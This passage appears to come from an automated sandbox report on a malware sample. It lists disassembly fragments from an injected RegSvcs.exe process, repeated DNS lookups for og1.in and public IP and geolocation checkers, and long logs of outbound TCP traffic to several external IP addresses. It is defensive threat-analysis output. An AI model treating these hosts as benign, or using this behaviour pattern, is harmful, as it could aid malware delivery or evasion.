            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00442CE1h23_2_00442A38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00443591h23_2_004432E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00443139h23_2_00442E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]23_2_00447698
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0044B149h23_2_0044AEA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004439E9h23_2_00443740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00440A21h23_2_00440778
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0044BA21h23_2_0044B778
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 004405C9h23_2_00440320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0044B5CAh23_2_0044B320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00440E79h23_2_00440BD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0044BE79h23_2_0044BBD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00444299h23_2_00443FF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 00443E41h23_2_00443B98
            Source: global trafficDNS query: name: og1.in
            Source: global trafficDNS query: name: og1.in
            Source: global trafficDNS query: name: og1.in
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49185 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49188 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49189 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49190 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49192 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49194 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49196 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49198 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49200 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49202 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 132.226.8.169:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 132.226.247.73:80
            Source: global trafficTCP traffic: 192.168.2.22:49180 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 192.168.2.22:49182 -> 193.122.6.168:80
            Source: global trafficTCP traffic: 192.168.2.22:49184 -> 193.122.6.168:80
            Source: global trafficTCP traffic: 192.168.2.22:49186 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 192.168.2.22:49187 -> 193.122.6.168:80
            Source: global trafficTCP traffic: 192.168.2.22:49187 -> 193.122.6.168:80
            Source: global trafficTCP traffic: 192.168.2.22:49187 -> 193.122.6.168:80
            Source: global trafficTCP traffic: 192.168.2.22:49191 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 192.168.2.22:49193 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 192.168.2.22:49195 -> 132.226.247.73:80
            Source: global trafficTCP traffic: 192.168.2.22:49197 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 192.168.2.22:49199 -> 132.226.247.73:80
            Source: global trafficTCP traffic: 192.168.2.22:49201 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.78.54:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.78.54:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.78.54:443
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.78.54:443
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.78.54:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.78.54:443
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 104.21.78.54:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 104.21.78.54:443
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49185 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49185 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49185 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49185 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49185 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49185 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49188 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49188 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49188 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49189 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49189 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49189 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49188 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49188 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49188 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49189 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49189 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49189 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49189 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49189 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49190 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49190 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49190 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49190 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49190 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49190 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49192 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49192 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49192 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49192 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49192 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49192 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49194 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49194 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49194 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49194 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49194 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49194 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49196 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49196 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49196 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49196 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49196 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49196 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49198 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49198 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49198 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49198 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49198 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49198 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49200 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49200 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49200 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49200 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49200 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49200 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49202 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49202 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49202 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49202 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49202 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49202 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
            Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 172.245.123.6:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.123.6:80
